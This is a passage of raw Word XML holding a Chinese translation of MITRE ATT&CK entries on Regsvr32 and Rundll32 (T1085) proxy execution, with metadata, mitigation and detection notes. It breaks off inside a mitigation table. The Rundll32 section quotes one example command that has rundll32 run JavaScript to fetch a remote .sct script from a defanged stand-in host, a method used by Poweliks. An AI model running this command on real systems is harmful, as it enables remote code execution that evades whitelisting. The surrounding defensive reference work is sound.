      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”攻击，已被</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于针对政府的活动中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2427C4AF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者还可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Regsvr32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来注册</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>以便</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>劫持建立持久性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B12506" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="77F8A399" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3AE61A8A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2895054A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="2F069AB4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18A91BDF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A9EF415" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>微软</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>EMET</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（增强缓解体验工具包）的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ASR</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（攻击面减少）功能来阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>regsvr32.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过白名单。在</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>适当的情况下，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用应用白名单工具（如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows Defender Application Control</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AppLocker</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或软件限制策略）来识别并阻止通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>regsvr32</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>功能执行的潜在恶意软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B69B366" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111418E3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0B8538" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来检测和分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>regsvr32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的执行和参数。将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>regsvr32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的最近调用与已知恰当参数及已加载文件的历史记录进行比较来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常和潜藏的攻击活动。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>regsvr32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用之前和之后使用的命令参数也可用于确定正在加载的脚本或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>动态链接库</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的来源和目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14029D7F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Rundll32</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="56E8AA50" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4360D70C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1085</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7526ACE4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>逃逸，执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67C3963F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5567CC9F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:lastRenderedPageBreak/>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A21D285" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程监控，进程命令行参数，二进制文件元数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E95FB3A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AD3C1C6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防病毒</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，应用白名单，数字证书验证</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58BDC3BC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Ricardo Dias</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Casey Smith</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="030AF86A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36DA948F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="7A820617" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>undll32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序可以调用来执行任意二进制文件。攻击者可能会利用此功能来代理执行代码，从而避免触发那些可能不会监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>rundll32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程执行的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>安全工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为正常操作中使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>rundll32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会有白名单或误报。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69309FE2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Rundll32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于通过未记录的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell32.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>Control_RunDLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>Control_RunDLLAsUser</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来执行控制面板项目文件（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.cpl</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双击</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.cpl</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件也会触发</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rundll32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097280F0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Rundll32</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>也可用于执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>等脚本。可以使用类似于下面的语法来完成：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。这种方法已被恶意软件如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Poweliks</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>所使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C936E1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00E65C70" w14:paraId="6724F1F8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2A4B185A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E65C70" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65C70">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1DF1FA88" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E65C70" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65C70">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="7AAAAC05" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F63AAA3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
